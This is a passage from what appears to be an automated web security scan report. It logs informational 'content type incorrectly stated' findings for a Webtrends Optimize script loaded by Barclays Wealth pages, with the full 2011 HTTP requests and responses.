6af491f3a80a8a30f117037707788fcc1c5c0e545bede61b1b5f83b28e140d41eab2e11d8b57b7124ad49abc9cb4645a2b4db844922e052a3fa45ce27b9080fd9d5b3f35a355ce4bd6debbbcc27738506f0ba79e08934a51f4abdd5be999a924dc8cf28c29405bf80125727f43370b60e421f42fb65b814a1037319a24cb7118940f44d02e754b3fb5002692544e0c8fdcc05bf447d1f54cf0b4d2f6fa2e5eab7ef6d2fa2e872533078eab591fc1660608ef17462cd9f445fdfee2ae179215751de5723ae413e5c4a1d6a6913776a484080cd69a7f84ff07952fa48a017e306b1ebe7897fcf3822ae0716932441531c4181a1a1ec184818828263f938b451d976b1ab58cdc6d3c20d37a7f48f5f980c7f34474938722c484d07360785fd1ed5db043df2991ac1ff1a04ec51daff296a1d301a337a3c7918c8f4dab8c15af2cfd449fda6b6cb311e68618d215ac6ca2bf10bfe3611788ee7015b2761bcbfb8d78a653d451b9752a3eb3b05dde2b4343a06a9748bfe5d3d999fe54900f1124be3e75f661cce54c016d7c29d8133993a5a21032a211cec0e6df46cc6e48f5f1d79bdf27ff85762a311e89853a66d55bae30542520607c390a59021e796565519f48f7f3880c270f7d6045a5417d365a6e9cf602200c9da6e950819f71cbd04da3f3be054bd67e261af3196b1ebe023d1774

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0559961c04ff6b73c5ef264ce3454f322350b19450f01a37aa2582023bf1ea2a8ecba14b5a16f41e1d972e83dfcea631a09cdedb0e2d1cf1bf36b1fcc9d50b0e97c6c7f2771bda94ec18d418aa92f9995e0d7ff270578ff5c2998040d55e9ee160fb30b111242e37a04f7295178e6204b7f1f54e7598f7fc341f1c69ec74920ca9aa1f2a336fe1ee579fc545b83e9524f0947eb12134ed992f28acc7159ca99fd2bb61d45f71d5eb98ecc40d2ed52c74c055e86679bb50a24b3cee4c65a9ce0e04902473dade8348278a72c0b9d07377cf8ea11d7f5bbf18868c84ca4753db60f4fab47067ae6f4ae2e566da81dc021489552b5b01abe4fdbaf4f3bed995cef7c7ea25587e144a9168a01af6e6ca8280eb566da59976123f4e27a9d1aac489e383e2a785d95ffc9ebcf3e71c4e7be8bdf90f2d3a5b6083f4ee0cececa81041e15c81f7c08976ab71f417b27c45ddb48b6a2b6e250b3270f55e16f75083e249b321f2a264298ff3c25c5202b5b37060f2869afd35e90d2b3bb39b6497a8d21b23f1b4d7360ebfabc2c01455352b52b92a0d1e700b45917858c294bbb079c1212ab7efdc00fd0e67390dce619490a68a90dabe82c3e6c4523bbe2370e44903ec1fff26af491f3a80a8a30f117037707788fcc1c5c0e545bede61b1b5f83b28e140d41eab2e11d8b57b7124ad49abc9cb4645a2b4db844922e052a3fa45ce27b9080fd9d5b3f35a355ce4bd6debbbcc27738506f0ba79e08934a51f4abdd5be999a924dc8cf28c29405bf80125727f43370b60e421f42fb65b814a1037319a24cb7118940f44d02e754b3fb5002692544e0c8fdcc05bf447d1f54cf0b4d2f6fa2e5eab7ef6d2fa2e872533078eab591fc1660608ef17462cd9f445fdfee2ae179215751de5723ae413e5c4a1d6a6913776a484080cd69a7f84ff07952fa48a017e306b1ebe7897fcf3822ae0716932441531c4181a1a1ec184818828263f938b451d976b1ab58cdc6d3c20d37a7f48f5f980c7f34474938722c484d07360785fd1ed5db043df2991ac1ff1a04ec51daff296a1d301a337a3c7918c8f4dab8c15af2cfd449fda6b6cb311e68618d215ac6ca2bf10bfe3611788ee7015b2761bcbfb8d78a653d451b9752a3eb3b05dde2b4343a06a9748bfe5d3d999fe54900f1124be3e75f661cce54c016d7c29d8133993a5a21032a211cec0e6df46cc6e48f5f1d79bdf27ff85762a311e89853a66d55bae30542520607c390a59021e796565519f48f7f3880c270f7d6045a5417d365a6e9cf602200c9da6e950819f71cbd04da3f3be054bd67e261af3196b1ebe023d1774 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/important-information.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A03C4F80BFCFBF92FCB64700ED6E25D0; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; _wt.mode-79569=fcdcc722e932043ee114; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6EDFD59FF31DFFC88DA19690B7FF95B4; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; Expires=Sun, 01-Jan-2012 00:03:18 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=01c65249; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93203b7c335; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.45. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055b27ece43f6b67250d626c3324dfc5f24665e19610aff21f06f7771fc5585dd90b50aa6c8281c8ebd2ba97ac4f849060f9bf5a8a7978a5df974008bda0bbcdc493071284fadbe1b9ece4490b55e8bc9d291f7261065f9772a81190210a5df2d53b3093a1e5baf6e4ee0281a66a1200432074bc2539f7fc318bbe2aee8205ba4b993c3d818c00abe76ae154ac4be1e16444df65c4d12929eb19ccc370786dda475b94a1dba4d45e0d49d109ce11f81671825f00bbf913c3d8496ffde4bb1e6a37a34610386c5149849847672b9277865f2d62bc9bcacedbe7bcc01b57b25f75119f416553cf0f9e3382818c37ba75532e024d0cc67f455cbf5112b9bce05b92d3eab5ac2a255a919c446c40134ec755ef66acc0a80662af3e760920bba4deb34233b0b23e7af8080927a2990a6f8cc86f68cb9d3df724b2e85caa480cc5d524a85713650c145b71a5a7929c45ddb48a1a7bffa54b73e0852fe69740434298d340d36343feba83b21c070571c72474b280cd2d25888cdb3ad39d8103f9073ea6456062434f0e3b43706520b52b917d0e3b2bb5287572dc4981551aa05c13f7df265f2d453c4ab23acd8e53d5c1c37b274f0a94c7b385428c3963c1c47d3689cf3a53cf195a6fb0f8d64f0460d76037b8bcd46595e0551b9e719160185b58116091bebe7e7408454b343178f9ab6cfe562577f19b64e907c0f2b6eaa50b82e9b80ff985b6332a659cd4986d1bce8c7233c0d3e59f69003cf1904f4aeda59b59ef975dcd8a38c791f5aae5725292f453c5a33e575fa2ee60c8e4a1f6765ce21cf7514c20745d827764c69ee052396594c0dd8d8c657a54ed0a74ef4e484aaa82c5aab7da3ddf83e9d335131b0de6c6986641702ba040f3ce29b04b9a5b4bf15d106770e8317549a7695d5acc7e1c4266bb1ee4641c0cf26ceab199321a4850164327f56ec2fc5a8f18921bd706c2e45032e8322745e5e8eca81ed7d633fd7ce0e5e8a7212b38bd27a3f3b8e7b705bbdedecf9e0512b93912dd1d3c26b7b4639c7fb06a959d36991b51ef5a24bc71da3fb9cf69e55bc37eb8786d7de09eacb0aee15eb0780d3303fe70de0881cd74fba61e6bd10e2e63215d8be211ab5764ecdfe8c27f005d144a2314028feff49cc2f540fa135c148e2f38c9a99f45f96531521ed6f27a53ac8e71a05647b718d136d92aba34c33f5139ac8e7df17cd6f4ff7a58fca8a23ffd5727d3e4ad8d46e66810bab63577720342c6d080d061f22693154cb4ff8ac81002359706213af427a62063dc0ae05245f9eaaed0dd7c824cbd64eacf4ed034d802b7f4af409215bf10f0c92dce57232c793a3e6abdabf4ba22b4583f63180f95a2452a3ef19a7b1aed4406a32a1a1ca57995641a23bd2851b1653e7e46fd65dcffa3be2858ef8df5e51fc8a87f861d8ba8edbeb93527d2f08308f06b02e4c782d206e57f58b0cbc9813b96bf04fac7df0c06130f8d0385b04d12a96  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055b27ece43f6b67250d626c3324dfc5f24665e19610aff21f06f7771fc5585dd90b50aa6c8281c8ebd2ba97ac4f849060f9bf5a8a7978a5df974008bda0bbcdc493071284fadbe1b9ece4490b55e8bc9d291f7261065f9772a81190210a5df2d53b3093a1e5baf6e4ee0281a66a1200432074bc2539f7fc318bbe2aee8205ba4b993c3d818c00abe76ae154ac4be1e16444df65c4d12929eb19ccc370786dda475b94a1dba4d45e0d49d109ce11f81671825f00bbf913c3d8496ffde4bb1e6a37a34610386c5149849847672b9277865f2d62bc9bcacedbe7bcc01b57b25f75119f416553cf0f9e3382818c37ba75532e024d0cc67f455cbf5112b9bce05b92d3eab5ac2a255a919c446c40134ec755ef66acc0a80662af3e760920bba4deb34233b0b23e7af8080927a2990a6f8cc86f68cb9d3df724b2e85caa480cc5d524a85713650c145b71a5a7929c45ddb48a1a7bffa54b73e0852fe69740434298d340d36343feba83b21c070571c72474b280cd2d25888cdb3ad39d8103f9073ea6456062434f0e3b43706520b52b917d0e3b2bb5287572dc4981551aa05c13f7df265f2d453c4ab23acd8e53d5c1c37b274f0a94c7b385428c3963c1c47d3689cf3a53cf195a6fb0f8d64f0460d76037b8bcd46595e0551b9e719160185b58116091bebe7e7408454b343178f9ab6cfe562577f19b64e907c0f2b6eaa50b82e9b80ff985b6332a659cd4986d1bce8c7233c0d3e59f69003cf1904f4aeda59b59ef975dcd8a38c791f5aae5725292f453c5a33e575fa2ee60c8e4a1f6765ce21cf7514c20745d827764c69ee052396594c0dd8d8c657a54ed0a74ef4e484aaa82c5aab7da3ddf83e9d335131b0de6c6986641702ba040f3ce29b04b9a5b4bf15d106770e8317549a7695d5acc7e1c4266bb1ee4641c0cf26ceab199321a4850164327f56ec2fc5a8f18921bd706c2e45032e8322745e5e8eca81ed7d633fd7ce0e5e8a7212b38bd27a3f3b8e7b705bbdedecf9e0512b93912dd1d3c26b7b4639c7fb06a959d36991b51ef5a24bc71da3fb9cf69e55bc37eb8786d7de09eacb0aee15eb0780d3303fe70de0881cd74fba61e6bd10e2e63215d8be211ab5764ecdfe8c27f005d144a2314028feff49cc2f540fa135c148e2f38c9a99f45f96531521ed6f27a53ac8e71a05647b718d136d92aba34c33f5139ac8e7df17cd6f4ff7a58fca8a23ffd5727d3e4ad8d46e66810bab63577720342c6d080d061f22693154cb4ff8ac81002359706213af427a62063dc0ae05245f9eaaed0dd7c824cbd64eacf4ed034d802b7f4af409215bf10f0c92dce57232c793a3e6abdabf4ba22b4583f63180f95a2452a3ef19a7b1aed4406a32a1a1ca57995641a23bd2851b1653e7e46fd65dcffa3be2858ef8df5e51fc8a87f861d8ba8edbeb93527d2f08308f06b02e4c782d206e57f58b0cbc9813b96bf04fac7df0c06130f8d0385b04d12a96

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055b27ece43f6b67250d626c3324dfc5f24665e19610aff21f06f7771fc5585dd90b50aa6c8281c8ebd2ba97ac4f849060f9bf5a8a7978a5df974008bda0bbcdc493071284fadbe1b9ece4490b55e8bc9d291f7261065f9772a81190210a5df2d53b3093a1e5baf6e4ee0281a66a1200432074bc2539f7fc318bbe2aee8205ba4b993c3d818c00abe76ae154ac4be1e16444df65c4d12929eb19ccc370786dda475b94a1dba4d45e0d49d109ce11f81671825f00bbf913c3d8496ffde4bb1e6a37a34610386c5149849847672b9277865f2d62bc9bcacedbe7bcc01b57b25f75119f416553cf0f9e3382818c37ba75532e024d0cc67f455cbf5112b9bce05b92d3eab5ac2a255a919c446c40134ec755ef66acc0a80662af3e760920bba4deb34233b0b23e7af8080927a2990a6f8cc86f68cb9d3df724b2e85caa480cc5d524a85713650c145b71a5a7929c45ddb48a1a7bffa54b73e0852fe69740434298d340d36343feba83b21c070571c72474b280cd2d25888cdb3ad39d8103f9073ea6456062434f0e3b43706520b52b917d0e3b2bb5287572dc4981551aa05c13f7df265f2d453c4ab23acd8e53d5c1c37b274f0a94c7b385428c3963c1c47d3689cf3a53cf195a6fb0f8d64f0460d76037b8bcd46595e0551b9e719160185b58116091bebe7e7408454b343178f9ab6cfe562577f19b64e907c0f2b6eaa50b82e9b80ff985b6332a659cd4986d1bce8c7233c0d3e59f69003cf1904f4aeda59b59ef975dcd8a38c791f5aae5725292f453c5a33e575fa2ee60c8e4a1f6765ce21cf7514c20745d827764c69ee052396594c0dd8d8c657a54ed0a74ef4e484aaa82c5aab7da3ddf83e9d335131b0de6c6986641702ba040f3ce29b04b9a5b4bf15d106770e8317549a7695d5acc7e1c4266bb1ee4641c0cf26ceab199321a4850164327f56ec2fc5a8f18921bd706c2e45032e8322745e5e8eca81ed7d633fd7ce0e5e8a7212b38bd27a3f3b8e7b705bbdedecf9e0512b93912dd1d3c26b7b4639c7fb06a959d36991b51ef5a24bc71da3fb9cf69e55bc37eb8786d7de09eacb0aee15eb0780d3303fe70de0881cd74fba61e6bd10e2e63215d8be211ab5764ecdfe8c27f005d144a2314028feff49cc2f540fa135c148e2f38c9a99f45f96531521ed6f27a53ac8e71a05647b718d136d92aba34c33f5139ac8e7df17cd6f4ff7a58fca8a23ffd5727d3e4ad8d46e66810bab63577720342c6d080d061f22693154cb4ff8ac81002359706213af427a62063dc0ae05245f9eaaed0dd7c824cbd64eacf4ed034d802b7f4af409215bf10f0c92dce57232c793a3e6abdabf4ba22b4583f63180f95a2452a3ef19a7b1aed4406a32a1a1ca57995641a23bd2851b1653e7e46fd65dcffa3be2858ef8df5e51fc8a87f861d8ba8edbeb93527d2f08308f06b02e4c782d206e57f58b0cbc9813b96bf04fac7df0c06130f8d0385b04d12a96 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6470427122C0BC6EEE06A97043357700; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e9320578927c; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05d2312f

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:32 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=9C508F0AF3DD2B4F832C1514175882E4; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d03ba21d2; Expires=Sun, 01-Jan-2012 00:31:33 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=0484ff0a; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e932044d57d7; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.46. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392dc0819f545f021534118f9f569ee81c351728f187795199770be34ebb53a2327b7fc746c20d964cfb4dfea0125ff139c3341beb23256558186065fa27eb351111e216b5d5bff304beb5361fa5b633f740e2ff4310189b88f0fdcc9947eb1364958744c1ee6b3c266973a8b35acfce01dcb675b695eedaac681d63f95872d95f574bf0a61b1cac09091a54fe2309e228076de461477d5f56e048992f975ba7ffb5f67b18a4a7c9d59a1fd30cf372bb0106e48f5117537ab15b1f16d38380999a1a0086c5a868a37413e24d4ed6ecd60f8b90128337441ecd46b9d01e78c2c8f9df5487f2e307677b4db3f33f947fb24b11a8261a57f7b12d8cb9adb1e535921aaa642aa50f12fa52522ae6f3b52a486dfd1ec7765f935ab3b41aa84f8df46f6b87de6ac55335e82496e147a946d1539c6e5e8e0b30c319ab3c8a0f61b1b236c14ac017d9627f463905cfaad2e9d53966c1ecb989de9efddfb3b1123b4ee4d7cbc3880c040fc45d3742c7738d1e567e67dc458d0bedf6a5e043dc7e4a48a52b25432a2b9a310b3f2627e5ef71719766274a6742423855c4931d9b98a5b87abe04298873bd3c40457c68eae7bf35095e1714b92b84e3c2ad178818519cdc2316ac1392490ef873ffc707cca523fc8ee36f5f1e67e925f4aa1d283d0325c8c56a1e47d43f99a0f43ea796f7f40dd833a7465472502ad891110f0a0151bee2471c0f84b58b450312e9e5b5418004b619188fc1edcde2625c7a13b64fc22f042a3efb50b37b9d86fa9d0c3e30a60e9948d4d0b9eac6733d563d5df7ca0498175aa0fbd95cbbc4f628df8aae8f2a1e0eaa52782526486f0a61b77ea67db20c8d4845316d9d20cf71409509428d35685d52a1423fc302171bcb84cf4ff74fd6f246e8f5d791a92f2fe93dfe938773c64272009faa7d68ca7c0f49bb1f1a2fdef143a8adb3ae4dc4036f0c8317049b7a9083abcdaec6716fe0ee4f4ec8c173d4ac1cc72ea3890a39322a4be87dc7aaf6d620bd7b6d3946133b941e1b131dd299c0ef3c312880c81557dc6e15b28b807c3561817a7f1ca2f88092f64122968672c187d7263f2a0087b709b249d079c5ad49f1a54f931cf9f5c0a5d650a537fcc0c2d98543a9dd14af7cab4197893c6db543ee8518d347ab6ef1bf4be4b56110d9e87c10b4724acdabd52da707d75ebd702e6eefe3588f781210a63dc34ff9fd94e78bb948ca584777a13e7fa26fc5f01741322c2c8f4939c2afa54d36a5129d9cb2de40cd6058eab5b9fdb0549ef065242a118bc52777bd32bf200b7236393f6d170b061d706533019c1bf2e48006700c716d1ea51f7f7e0e6895f8562a51c0a7ba1a879a749d8616a3aab60307856c320d98646317ae5b1c9fcdb56433c6dcf0efb68ab843a27d44d8aa3e83e8153e3bcff95bf2e0bf885b6920b8b2a339d81b4abe7bd9941d0e06b0e76ed70797a730b79e8deed61347b883d2b22ac3a1c79f00f9213c  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392dc0819f545f021534118f9f569ee81c351728f187795199770be34ebb53a2327b7fc746c20d964cfb4dfea0125ff139c3341beb23256558186065fa27eb351111e216b5d5bff304beb5361fa5b633f740e2ff4310189b88f0fdcc9947eb1364958744c1ee6b3c266973a8b35acfce01dcb675b695eedaac681d63f95872d95f574bf0a61b1cac09091a54fe2309e228076de461477d5f56e048992f975ba7ffb5f67b18a4a7c9d59a1fd30cf372bb0106e48f5117537ab15b1f16d38380999a1a0086c5a868a37413e24d4ed6ecd60f8b90128337441ecd46b9d01e78c2c8f9df5487f2e307677b4db3f33f947fb24b11a8261a57f7b12d8cb9adb1e535921aaa642aa50f12fa52522ae6f3b52a486dfd1ec7765f935ab3b41aa84f8df46f6b87de6ac55335e82496e147a946d1539c6e5e8e0b30c319ab3c8a0f61b1b236c14ac017d9627f463905cfaad2e9d53966c1ecb989de9efddfb3b1123b4ee4d7cbc3880c040fc45d3742c7738d1e567e67dc458d0bedf6a5e043dc7e4a48a52b25432a2b9a310b3f2627e5ef71719766274a6742423855c4931d9b98a5b87abe04298873bd3c40457c68eae7bf35095e1714b92b84e3c2ad178818519cdc2316ac1392490ef873ffc707cca523fc8ee36f5f1e67e925f4aa1d283d0325c8c56a1e47d43f99a0f43ea796f7f40dd833a7465472502ad891110f0a0151bee2471c0f84b58b450312e9e5b5418004b619188fc1edcde2625c7a13b64fc22f042a3efb50b37b9d86fa9d0c3e30a60e9948d4d0b9eac6733d563d5df7ca0498175aa0fbd95cbbc4f628df8aae8f2a1e0eaa52782526486f0a61b77ea67db20c8d4845316d9d20cf71409509428d35685d52a1423fc302171bcb84cf4ff74fd6f246e8f5d791a92f2fe93dfe938773c64272009faa7d68ca7c0f49bb1f1a2fdef143a8adb3ae4dc4036f0c8317049b7a9083abcdaec6716fe0ee4f4ec8c173d4ac1cc72ea3890a39322a4be87dc7aaf6d620bd7b6d3946133b941e1b131dd299c0ef3c312880c81557dc6e15b28b807c3561817a7f1ca2f88092f64122968672c187d7263f2a0087b709b249d079c5ad49f1a54f931cf9f5c0a5d650a537fcc0c2d98543a9dd14af7cab4197893c6db543ee8518d347ab6ef1bf4be4b56110d9e87c10b4724acdabd52da707d75ebd702e6eefe3588f781210a63dc34ff9fd94e78bb948ca584777a13e7fa26fc5f01741322c2c8f4939c2afa54d36a5129d9cb2de40cd6058eab5b9fdb0549ef065242a118bc52777bd32bf200b7236393f6d170b061d706533019c1bf2e48006700c716d1ea51f7f7e0e6895f8562a51c0a7ba1a879a749d8616a3aab60307856c320d98646317ae5b1c9fcdb56433c6dcf0efb68ab843a27d44d8aa3e83e8153e3bcff95bf2e0bf885b6920b8b2a339d81b4abe7bd9941d0e06b0e76ed70797a730b79e8deed61347b883d2b22ac3a1c79f00f9213c

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392dc0819f545f021534118f9f569ee81c351728f187795199770be34ebb53a2327b7fc746c20d964cfb4dfea0125ff139c3341beb23256558186065fa27eb351111e216b5d5bff304beb5361fa5b633f740e2ff4310189b88f0fdcc9947eb1364958744c1ee6b3c266973a8b35acfce01dcb675b695eedaac681d63f95872d95f574bf0a61b1cac09091a54fe2309e228076de461477d5f56e048992f975ba7ffb5f67b18a4a7c9d59a1fd30cf372bb0106e48f5117537ab15b1f16d38380999a1a0086c5a868a37413e24d4ed6ecd60f8b90128337441ecd46b9d0